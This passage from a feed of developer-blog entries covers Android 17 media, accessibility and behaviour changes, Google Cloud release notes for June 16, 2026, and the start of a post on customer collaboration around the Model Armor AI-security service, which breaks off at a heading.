&lt;h3&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFjWXyRLybiLVAIrIm1_60XHXhPmpB1QEph7AuqsGHs-NihIDRFbUgBh32gUKxo30173W-RpEInX9hmYFVnW5V8ZqtM3n_CzxlT0B0PVQr0LSOuOi7x2kZgN_jHRRlYJ7bYInZllvUGNoA_SrXkNi5wwHvUghUcnl0Gsgx_-ts4QEHq_KdbEYgWCg92xA/s798/Hide%20First%20Letter.gif" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFjWXyRLybiLVAIrIm1_60XHXhPmpB1QEph7AuqsGHs-NihIDRFbUgBh32gUKxo30173W-RpEInX9hmYFVnW5V8ZqtM3n_CzxlT0B0PVQr0LSOuOi7x2kZgN_jHRRlYJ7bYInZllvUGNoA_SrXkNi5wwHvUghUcnl0Gsgx_-ts4QEHq_KdbEYgWCg92xA/s16000/Hide%20First%20Letter.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/h3&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;i&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Smarter password protection for physical inputs&lt;/i&gt;&lt;/div&gt;&lt;/i&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h2 style="text-align: left;"&gt;Media and camera features that empower creators and delight users
&lt;/h2&gt;&lt;p&gt;Android 17 introduces new &lt;a href="https://blog.google/products-and-platforms/platforms/android/android-17-creator-features/"&gt;creator features&lt;/a&gt; that give access to pro-quality cameras and media, all while improving the experience for consumers.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href="https://developer.android.com/media/platform/integrate-eclipsa-video"&gt;Eclipsa Video&lt;/a&gt;: HDR video standard built upon the &lt;a href="https://github.com/SMPTE/st2094-50"&gt;SMPTE ST 2094-50 specification&lt;/a&gt; that introduces new metadata to help devices adapt content for their display headroom and ambient light conditions, as well as improve the simultaneous display of standard and HDR content.&lt;/li&gt;
  &lt;li&gt;RAW14 image format: New support for the &lt;a href="https://developer.android.com/reference/kotlin/android/graphics/ImageFormat#raw14"&gt;RAW14 image format&lt;/a&gt; provides a way for your professional camera app to capture the highest level of detail and color depth from compatible camera sensors.&lt;/li&gt;
  &lt;li&gt;Vendor-defined camera extensions: Vendor-defined extensions enable hardware partners to define and implement custom camera extension modes, providing access to the best and latest camera features.&lt;/li&gt;
  &lt;li&gt;Extended HE-AAC software encoder: A new system-provided Extended HE-AAC software encoder, supports both low and high bitrates using unified speech and audio coding, providing significantly better audio quality for voice messages in low-bandwidth conditions, including support for loudness metadata.&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://developer.android.com/guide/topics/media/media-formats#video-formats"&gt;Versatile Video Coding (H.266)&lt;/a&gt;:  Enables OEMs to add codec support by defining the &lt;a href="https://developer.android.com/guide/topics/media/media-formats#video-formats"&gt;video/vvc&lt;/a&gt; MIME type in &lt;a href="https://developer.android.com/reference/android/media/MediaFormat"&gt;&lt;code&gt;MediaFormat&lt;/code&gt;&lt;/a&gt;, adding new VVC profiles in &lt;a href="https://developer.android.com/reference/android/media/MediaCodecInfo"&gt;&lt;code&gt;MediaCodecInfo&lt;/code&gt;&lt;/a&gt;, and integrating support into &lt;a href="https://developer.android.com/reference/android/media/MediaExtractor"&gt;&lt;code&gt;MediaExtractor&lt;/code&gt;&lt;/a&gt;.&lt;/li&gt;
  &lt;li&gt;Camera device type: New APIs that query the underlying device type to identify if a camera is built-in hardware, an external USB webcam, or a virtual camera.&lt;/li&gt;
  &lt;li&gt;Constant Quality for Video Recording: &lt;a href="https://developer.android.com/reference/android/media/MediaRecorder#setVideoEncodingQuality(int)"&gt;&lt;code&gt;SetVideoEncodingQuality&lt;/code&gt;&lt;/a&gt; in &lt;a href="https://developer.android.com/reference/android/media/MediaRecorder"&gt;&lt;code&gt;MediaRecorder&lt;/code&gt;&lt;/a&gt; configures a constant quality (CQ) mode for video encoders to ensure uniform visual fidelity across the entire video.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;Better support for hearing aids&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt;Bluetooth LE Audio hearing aid support: Android now includes a specific device category for Bluetooth Low Energy (BLE) Audio hearing aids with the new &lt;a href="https://developer.android.com/reference/android/media/AudioDeviceInfo#TYPE_BLE_HEARING_AID"&gt;&lt;code&gt;AudioDeviceInfo.TYPE_BLE_HEARING_AID&lt;/code&gt;&lt;/a&gt; constant, so your app can distinguish hearing aids from regular headsets to provide a tailored experience for users with assistive listening devices.&lt;/li&gt;
  &lt;li&gt;Granular audio routing for hearing aids: Android 17 allows users to independently manage where specific system sounds are played. They can choose to route notifications, ringtones, and alarms to connected hearing aids or the device's built-in speaker, helping to avoid unwanted in-ear interruptions while maintaining a Bluetooth connection for hearing aid management apps.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;CameraX and  Media3&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://developer.android.com/jetpack/androidx/releases/camerax"&gt;CameraX&lt;/a&gt; and &lt;a href="https://developer.android.com/jetpack/androidx/releases/media3"&gt;Media3&lt;/a&gt; have been updated for Android 17. They are there to do the heavy lifting, smoothing the rough edges of media development and simplifying building reliable camera capture,  smooth media playback, and creative and complex editing experiences. &lt;/p&gt;

&lt;p&gt;We've released an &lt;a href="https://github.com/android/skills/tree/main/camera"&gt;agent skill&lt;/a&gt; that can migrate legacy Android camera implementations (Camera1 or raw Camera2 APIs) to CameraX.&lt;/p&gt;
  
&lt;p&gt;Note: You'll need to update your CameraX version to either 1.5.2 or 1.6.0+ to avoid a crash related to an added dynamic range mode on Android 17 devices.&lt;/p&gt;

&lt;h3&gt;Get your apps, libraries, tools, and game engines ready!&lt;/h3&gt;
&lt;p&gt;If you develop an Android SDK, library, tool, or game engine, it's critical to prepare any necessary updates now to prevent your downstream app and game developers from being blocked by compatibility issues and allow them to target the latest SDK features. Please let your downstream developers know if updates are needed to fully support Android 17.&lt;/p&gt;

&lt;p&gt;Testing involves installing your production app or a test app making use of your library or engine using Google Play or other means onto a device or emulator running Android 17 Beta 4. Work through all your app's flows and look for functional or UI issues. Each release of Android contains platform changes that improve privacy, security, and overall user experience; review the app impacting behavior changes for apps &lt;a href="https://developer.android.com/about/versions/17/behavior-changes-all"&gt;running on&lt;/a&gt; and &lt;a href="https://developer.android.com/about/versions/17/behavior-changes-17"&gt;targeting&lt;/a&gt; Android 17 to focus your testing, including the following:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Resizability on large screens: Once you target Android 17 (SDK 37), you can no longer opt out of maintaining orientation, resizability and aspect ratio constraints &lt;a href="https://developer.android.com/about/versions/17/changes/ff-restrictions-ignored"&gt;on large screens&lt;/a&gt;.&lt;/li&gt;
  &lt;li&gt;Dynamic code loading: If your app targets SDK 37 or higher, the Safer Dynamic Code Loading (DCL) protection &lt;a href="https://developer.android.com/about/versions/14/behavior-changes-14#safer-dynamic-code-loading"&gt;introduced in Android 14 &lt;/a&gt;for DEX and JAR files now extends to native libraries. All native files loaded using System.load() must be marked as read-only. Otherwise, the system throws UnsatisfiedLinkError.&lt;/li&gt;
  &lt;li&gt;Enable CT by default: &lt;a href="https://developer.android.com/privacy-and-security/security-config#CertificateTransparencySummary"&gt;Certificate transparency (CT)&lt;/a&gt; is enabled by default. (On Android 16, CT is available but apps had to &lt;a href="https://developer.android.com/privacy-and-security/security-config#certificateTransparency"&gt;opt in&lt;/a&gt;.)&lt;/li&gt;
  &lt;li&gt;Local network protections: Apps targeting SDK 37 or higher have &lt;a href="https://developer.android.com/privacy-and-security/local-network-permission#android-17-enforcement"&gt;local network access blocked by default&lt;/a&gt;. Switch to using privacy preserving pickers if possible, and use the new &lt;a href="https://developer.android.com/reference/kotlin/android/Manifest.permission#access_local_network"&gt;&lt;b&gt;&lt;code&gt;ACCESS_LOCAL_NETWORK&lt;/code&gt;&lt;/b&gt;permission for broad, persistent access.&lt;/li&gt;
  &lt;li&gt;Background audio hardening: Starting in Android 17, the audio framework enforces &lt;a href="https://developer.android.com/about/versions/17/changes/bg-audio"&gt;restrictions on background audio interactions&lt;/a&gt; including audio playback, &lt;a href="https://developer.android.com/media/optimize/audio-focus"&gt;audio focus&lt;/a&gt; requests, and &lt;a href="https://developer.android.com/reference/android/media/AudioManager#adjustStreamVolume(int,%20int,%20int)"&gt;volume change&lt;/a&gt; APIs. Based on your feedback, we’ve made some changes since beta 2, including targetSDK gating while-in-use FGS enforcement and exempting alarm audio. Full details available in the &lt;a href="https://developer.android.com/about/versions/17/changes/bg-audio"&gt;updated guidance&lt;/a&gt;.&lt;/li&gt;
  &lt;li&gt;NPU access declaration: Apps targeting Android 17 that need to directly access the NPU must declare&amp;nbsp;&lt;a href="https://developer.android.com/reference/kotlin/android/content/pm/PackageManager#feature_neural_processing_unit"&gt;FEATURE_NEURAL_PROCESSING_UNIT&lt;/a&gt; in their manifest to avoid being blocked from accessing the NPU. This includes apps that use the &lt;a href="https://ai.google.dev/edge/litert/next/npu"&gt;LiteRT NPU delegate&lt;/a&gt;, vendor-specific SDKs, as well as the deprecated &lt;a href="https://developer.android.com/ndk/guides/neuralnetworks"&gt;NNAPI&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Get started with Android 17&lt;/h3&gt;
&lt;p&gt;Your Pixel device should get Android 17 shortly if you haven't already been on the Android Beta. If you don’t have a Pixel device, you can &lt;a href="https://developer.android.com/about/versions/17/get#on_emulator"&gt;use the 64-bit system images with the Android Emulator&lt;/a&gt; in Android Studio. If you are currently on Android 17 Beta 4.1 and have not yet taken an Android 17 QPR1 beta, you can opt out of the program and you will then be offered the release version of Android 17 over the air.&lt;/p&gt;
&lt;h3&gt;Getting the Android 17 beta on partner devices&lt;/h3&gt;
&lt;p&gt;Android 17 is available in beta on handset, tablet, and foldable form factors &lt;a href="https://developer.android.com/about/versions/17/devices"&gt;from partners&lt;/a&gt; including Honor, iQOO, Lenovo, OnePlus, OPPO, Realme, Sharp, vivo, and Xiaomi.&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy5cwRcpdR2j-1KMzQPpsxvIODRLlVkaFNQEIQoNaPQa4X4rgEna5imminlwFdcSJ3xihXdUSFouOC0-ZKyK1A53cBmoaU03au-FjfsqkPXm0tPLtOaWT_7z8tqnMmQjFOr-YIKeP3BMVq8Hmd7yH0zllW1aFMuiW6AAAcDUVL7aIyCAIZUs0d_0VMdF4/s1653/android-17-beta-partners.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy5cwRcpdR2j-1KMzQPpsxvIODRLlVkaFNQEIQoNaPQa4X4rgEna5imminlwFdcSJ3xihXdUSFouOC0-ZKyK1A53cBmoaU03au-FjfsqkPXm0tPLtOaWT_7z8tqnMmQjFOr-YIKeP3BMVq8Hmd7yH0zllW1aFMuiW6AAAcDUVL7aIyCAIZUs0d_0VMdF4/s16000/android-17-beta-partners.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;

&lt;p&gt;For the best development experience with Android 17, we recommend that you use the latest Canary build of &lt;a href="https://developer.android.com/studio/preview"&gt;Android Studio Quail&lt;/a&gt;. Once you’re set up, here are some of the things you should do:&lt;/p&gt;
&lt;p&gt;Test your current app for compatibility, learn whether your app is &lt;a href="https://developer.android.com/about/versions/17/behavior-changes-all"&gt;affected by changes in Android 17&lt;/a&gt;, and install your app onto a device or &lt;a href="https://developer.android.com/studio/run/emulator"&gt;Android Emulator&lt;/a&gt; running Android 17 and extensively test it.&lt;/p&gt;

&lt;p&gt;Thank you again to everyone who participated in our Android developer preview and beta program. We're looking forward to seeing how your apps take advantage of the updates in Android 17, and have plans to bring you updates in a fast-paced release cadence going forward.&lt;/p&gt;
&lt;p&gt;For complete information on Android 17 please visit the &lt;a href="https://developer.android.com/about/versions/17"&gt;Android 17 developer site&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/06/Android-17.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-06-16T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_16_2026</id>
    <title>Cloud Release Notes — June 16, 2026</title>
    <updated>2026-06-16T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;AlloyDB for PostgreSQL&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;AlloyDB integration with Knowledge Catalog is now generally available (&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;GA&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;This integration provides a unified metadata view to simplify data governance and analysis. It includes near real-time synchronization and expanded metadata details, like primary and foreign keys.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/alloydb/docs/knowledge-catalog-integration"&gt;Integrate AlloyDB with Knowledge Catalog&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Apigee hybrid&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;h3 id="v1146"&gt;v1.14.6&lt;/h3&gt;
&lt;p&gt;On June 16, 2026 we released an updated version of the Apigee hybrid software, v1.14.6.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;For information on upgrading, see &lt;a href="https://docs.cloud.google.com/apigee/docs/hybrid/v1.14/upgrade"&gt;Upgrading Apigee hybrid to version v1.14.6&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;For information on new installations, see &lt;a href="https://docs.cloud.google.com/apigee/docs/hybrid/v1.14/big-picture"&gt;The big picture&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note:&lt;/strong&gt;&lt;span&gt; This is a patch release: The container images used in patch releases are integrated with the Apigee hybrid Helm charts. Upgrading to a patch via the Helm chart automatically updates the images. No manual image changes are typically needed. For information on container image support in Apigee hybrid releases, see &lt;a href="https://docs.cloud.google.com/apigee/docs/release/apigee-release-process#apigee-hybrid-container-images"&gt;Apigee release process&lt;/a&gt;.&lt;/span&gt;&lt;/aside&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Various security and CVE fixes are included in this release.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;BigQuery&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Table Explorer behavior is moving to the &lt;strong&gt;Reference&lt;/strong&gt; panel. This transition
will occur in July 2026 or later. For more information, see
&lt;a href="https://docs.cloud.google.com/bigquery/docs/table-explorer"&gt;Table Explorer&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud SQL for PostgreSQL&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;QueryData adds support for parameterized secure views (PSVs) to help secure
applications that use natural language queries. For more information, see &lt;a href="https://docs.cloud.google.com/sql/docs/postgres/secure-app-data-parameterized-secure-views-qd"&gt;Secure
and control access to application data&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This feature is in &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Compute Engine&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;For resource-based committed use discounts (CUDs), the default value of CUD
scope for most Cloud Billing accounts has changed from &lt;strong&gt;Project&lt;/strong&gt; to
&lt;strong&gt;Billing account&lt;/strong&gt;. If the CUD scope is set to &lt;strong&gt;Billing account&lt;/strong&gt;, then
resource-based CUDs from a commitment are shared across all projects in that
account. If the CUD scope is set to &lt;strong&gt;Project&lt;/strong&gt;, then resource-based CUDs from a
commitment are available to only the project in which you purchased that
commitment.&lt;/p&gt;
&lt;p&gt;Depending on the Cloud Billing account's creation date and the active
commitments in that account, this change applies in the following way:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Cloud Billing accounts created on or after June 16, 2026&lt;/strong&gt;: The
CUD scope is &lt;strong&gt;Billing account&lt;/strong&gt; (CUD sharing enabled) by default.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud Billing accounts created before June 16, 2026&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;If the account has &lt;strong&gt;no active resource-based commitments&lt;/strong&gt; on
June 16, 2026, then the CUD scope has changed to &lt;strong&gt;Billing account&lt;/strong&gt;
(CUD sharing enabled).&lt;/li&gt;
&lt;li&gt;If the account has &lt;strong&gt;any active resource-based commitments&lt;/strong&gt; on June 16,
2026, then the CUD scope remains unchanged and Google Cloud continues
to use your existing configuration.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see
&lt;a href="https://docs.cloud.google.com/compute/docs/committed-use-discounts/share-resource-cuds-across-projects#cud-scope-configuration"&gt;Share resource-based CUDs across projects&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Confidential VM&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Support for the accelerator-optimized
&lt;a href="https://docs.cloud.google.com/compute/docs/accelerator-optimized-machines#g4-vms"&gt;g4-standard-48 machine type&lt;/a&gt;
for securely running AI and ML workloads is available in
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;, with the
following specifications:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;5th Generation AMD EPYC Turin processor&lt;/li&gt;
&lt;li&gt;AMD SEV&lt;/li&gt;
&lt;li&gt;1 NVIDIA RTX PRO 6000 GPU&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Dataflow&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Dataflow now supports NVIDIA RTX Pro 6000 GPUs. You can use this
GPU model to run your Apache Beam pipelines on Dataflow. RTX
Pro 6000 GPUs are recommended for large, medium, and small model inference
workloads. To configure your workers with this GPU model, set the accelerator
type to &lt;code&gt;nvidia-rtx-pro-6000&lt;/code&gt;. For more information, see &lt;a href="https://docs.cloud.google.com/dataflow/docs/gpu/gpu-support"&gt;Dataflow
support for GPUs&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Gemini Enterprise: ServiceNow data store actions and federation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The ServiceNow data store supports federation and assistant actions in
Gemini Enterprise.&lt;/p&gt;
&lt;p&gt;You can connect a ServiceNow site to search and read incidents, change
requests, tasks, and knowledge base articles using natural language. You
can also perform actions, such as creating and updating incidents,
directly from the Gemini Enterprise app.&lt;/p&gt;
&lt;p&gt;This feature is generally available (GA). For more information, see
&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/servicenow"&gt;Connect ServiceNow&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google Distributed Cloud (software only) for bare metal&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Google Distributed Cloud (software only) for bare metal 1.35.200-gke.66 is now available for
download. To upgrade, see &lt;a href="how-to/upgrade"&gt;Upgrade clusters&lt;/a&gt;.
Google Distributed Cloud for bare metal
1.35.200-gke.66 runs on Kubernetes v1.35.3-gke.400.&lt;/p&gt;
&lt;p&gt;After a release, it takes approximately 7 to 14 days for the version to become
available for installations or upgrades with the GKE On-Prem API clients: the
Google Cloud console, the gcloud CLI, and Terraform.&lt;/p&gt;
&lt;p&gt;If you use a third-party storage vendor, check the Google Distributed Cloud-ready
storage partners document to make sure the storage vendor has already passed the
qualification for this release of Google Distributed Cloud for bare metal.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;The following issues were fixed in 1.35.200-gke.66:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Fixed vulnerabilities listed in &lt;a href="https://docs.cloud.google.com/kubernetes-engine/distributed-cloud/bare-metal/docs/vulnerabilities"&gt;Vulnerability fixes&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Fixed an issue where a transient or partial failure during node pool updates
could cause node taints or labels to become permanently stuck (stranded) on
worker nodes, even after you removed them from the NodePool custom resource
specification.
&lt;/li&gt;
&lt;li&gt;Fixed an issue where, during the machine initialization phase, the
&lt;code&gt;etcd-events&lt;/code&gt; pod read the stale data directory when it started
and attempted to reuse the old member ID to rejoin the cluster instead of the
new one. Trying to use the old member ID to rejoin the cluster resulted in an
infinite retry loop and caused the cluster to reject the connection. The fix
ensures the &lt;code&gt;/var/lib/etcd-events&lt;/code&gt; directory is
cleared upon failure, and adds retry logic to &lt;code&gt;kubeadm-reset&lt;/code&gt; to improve resiliency against transient API errors.
&lt;/li&gt;
&lt;li&gt;Fixed an issue where, when enabling or updating etcd encryption, the API
server was terminated abruptly, causing transient connection timeouts or
failures for in-cluster workloads for up to five minutes.
&lt;/li&gt;
&lt;li&gt;Fixed an issue where, during control plane certificate rotation or etcd
encryption updates, the installer stalled for three minutes per control plane node
while waiting for the local API server to restart, causing nodes to temporarily
report an Unknown status and triggering transient routing disruptions (such as
503 Service Unavailable or ImagePullBackOff errors) for workloads scheduled on
those nodes.&lt;/li&gt;&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;New Documentation changelogs&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google SecOps is now releasing a monthly changelog to capture major documentation updates.&lt;/p&gt;
&lt;p&gt;For more information, refer to &lt;a href="https://docs.cloud.google.com/chronicle/docs/changelogs/changelogs"&gt;Documentation changelog&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps SIEM&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;New Documentation changelogs&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google SecOps is now releasing a monthly changelog to capture major documentation updates.&lt;/p&gt;
&lt;p&gt;For more information, refer to &lt;a href="https://docs.cloud.google.com/chronicle/docs/changelogs/changelogs"&gt;Documentation changelog&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;New Documentation changelogs&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google SecOps is now releasing a monthly changelog to capture major documentation updates.&lt;/p&gt;
&lt;p&gt;For more information, refer to &lt;a href="https://docs.cloud.google.com/chronicle/docs/changelogs/changelogs"&gt;Documentation changelog&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Managed Service for Apache Spark&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Managed Service for Apache Spark&lt;/strong&gt; (formerly Dataproc on Compute Engine): Rollout of the &lt;a href="https://docs.cloud.google.com/dataproc/docs/concepts/versioning/dataproc-version-clusters#supported-dataproc-image-versions"&gt;new sub-minor versions without pre-configured channels&lt;/a&gt; will begin on June 22, 2026, delayed from the previously planned date of June 15, 2026 ETA.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Secure Web Proxy&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can now use &lt;a href="https://docs.cloud.google.com/secure-web-proxy/docs/policies-and-rules-overview#authorization-policies"&gt;authorization
policies&lt;/a&gt;
to perform identity-based and content-based access control checks when
processing outbound traffic requests through Secure Web Proxy.&lt;/p&gt;
&lt;p&gt;By &lt;a href="https://docs.cloud.google.com/secure-web-proxy/docs/setup-authz-policies"&gt;configuring authorization
policies&lt;/a&gt;, you can set rules for
your workloads to access external destinations. You can also use these
authorization policies to delegate complex authorization decisions to identity
and content-scanning services like Service Extensions. This feature is
supported in &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can &lt;a href="https://docs.cloud.google.com/secure-web-proxy/docs/use-frontend-mtls-with-swp"&gt;integrate frontend mutual TLS (mTLS) with
Secure Web Proxy&lt;/a&gt; to boost
the security of your applications and workloads.&lt;/p&gt;
&lt;p&gt;With this integration, you can use validated client identities in
Secure Web Proxy &lt;a href="https://docs.cloud.google.com/secure-web-proxy/docs/policies-and-rules-overview#authorization-policies"&gt;authorization
policies&lt;/a&gt;
to enforce granular access control for outbound traffic. This feature is
supported in &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_16_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-16T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/how-customer-collaboration-is-shaping-the-future-of-genai-security-with-model-armor/</id>
    <title>How customer collaboration is shaping the future of GenAI security with Model Armor</title>
    <updated>2026-06-16T07:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud, we believe that the best products are built in partnership with our customers. Their feedback and real-world experiences are invaluable in helping refine our services and deliver solutions that truly meet our customers’ needs. In January 2026, our Google Cloud Developer Advocacy team participated in a high-velocity technical sprint with a major Google Cloud customer and a leader in the telecommunications industry.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This collaborative engagement provided us with deep insights, leading to significant enhancements in &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Model Armor&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; information experience, our service for Runtime security for generative and agentic AI.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Accelerating GenAI adoption through "radical empathy"&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The objective of this engagement was to support the productionization of a next-generation GenAI customer support platform built using Google Cloud's &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent Development Kit (ADK)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent Platform&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. By sitting directly with the customer's developers and security specialists, we gained a unique opportunity to observe how developers interact with Gemini Enterprise Agent Platform in a live, complex environment.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;This experience provided something traditional documentation cycles cannot replicate: &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;radical empathy&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. By logging friction point&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;s, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;as developers worked, we translated functional blockers into technical insights in real-time, identifying exactly where developers were hindered by ambiguous configuration guidance or a lack of granular detail.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image_1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image_1_ir5Nrkw.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Key discoveries from the front lines&lt;/h3&gt;
